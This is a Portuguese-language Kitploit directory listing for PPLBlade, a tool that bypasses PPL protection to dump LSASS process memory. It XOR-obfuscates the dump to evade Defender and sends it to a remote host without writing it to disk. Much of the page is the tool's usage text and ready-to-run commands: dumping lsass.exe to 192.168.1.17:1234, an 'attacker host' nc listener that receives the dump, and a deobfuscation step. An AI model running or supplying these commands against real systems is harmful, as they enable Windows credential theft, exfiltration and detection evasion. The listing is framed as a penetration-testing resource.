Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PPLBlade — Contorna a proteção PPL para despejar a memória do processo LSASS, ofusca os arquivos de despejo com XOR e os exfiltra remotamente via RAW ou SMB sem gravar em disco. | Kitploit
Ferramentas/GitHubGitHub/tastypepperoni/pplblade
Escalada de PrivilégiosForensia de MemóriaExploraçãoExfiltração de DadosPós-Exploração
GitHubtastypepperoni/pplblade

PPLBlade

Contorna a proteção PPL para despejar a memória do processo LSASS, ofusca os arquivos de despejo com XOR e os exfiltra remotamente via RAW ou SMB sem gravar em disco.

Ver Repositório
59763há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PPLBlade

Ferramenta de despejo de processo protegido que suporta ofuscação de dump de memória e transferência para workstations remotas sem salvá-lo no disco.

Funcionalidades principais:

  1. Bypass da proteção PPL
  2. Ofuscar arquivos de dump de memória para evadir mecanismos de detecção baseados em assinatura do Defender
  3. Upload de dump de memória com métodos de upload RAW e SMB sem salvá-lo no disco (dump sem arquivo)

Visão geral das técnicas usadas nesta ferramenta pode ser encontrada aqui: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Observe que PROCEXP15.SYS está listado nos arquivos fonte para fins de compilação. Não precisa ser transferido para a máquina alvo junto com o PPLBlade.exe.

Ele já está embutido no PPLBlade.exe. O exploit é apenas um único executável.

Modos:

  1. Dump - Despejar memória do processo usando PID ou Nome do Processo
  2. Decrypt - Reverter arquivo de dump ofuscado(--obfuscate) ao seu estado original
  3. Cleanup - Fazer limpeza manualmente, caso algo dê errado na execução (Observe que os valores das opções devem ser os mesmos da execução que estamos tentando limpar)
  4. DoThatLsassThing - Despejar lsass.exe usando o driver do Process Explorer (poc básico)

Modos de Handle:

  1. Direct - Abre handle PROCESS_ALL_ACCESS diretamente, usando a função OpenProcess()
  2. Procexp - Usa PROCEXP152.sys para obter um handle
root@kitploit:~
Usage of PPLBlade.exe:
  -driver string
        Path where the driver file will be dropped (default: current directory)
  -dumpmode string
        Dump mode [local|network] (default "local")
  -dumpname string
        Name of the dump file (default "PPLBlade.dmp")
  -handle string
        Method to obtain target process handle [direct|procexp] (default "direct")
  -help
        Prints this help message
  -ip string
        IP of the remote server
  -key string
        XOR Key for obfuscation (default "PPLBlade")
  -mode string
        Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
  -name string
        Process name of target process
  -network string
        Method for network transfer[raw|smb] (default "raw")
  -obfuscate
        Obfuscate dump file
  -pass string
        SMB password
  -pid int
        PID of target process (prioritized over process name)
  -port int
        PORT on the remote server
  -quiet
        Quiet mode
  -service string
        Name of the service (default "PPLBlade")
  -share string
        share name
  -user string
        SMB username

Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup

Exemplos:

POC básico que usa PROCEXP152.sys para despejar lsass:

root@kitploit:~
PPLBlade.exe --mode dothatlsassthing

(Observe que ele não faz XOR do arquivo de dump, forneça uma flag obfuscate adicional para habilitar a funcionalidade XOR)

Faça upload do dump LSASS ofuscado para um local remoto:

root@kitploit:~
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Host atacante:

root@kitploit:~
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Desofuscar dump de memória:

root@kitploit:~
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
Baixar ferramenta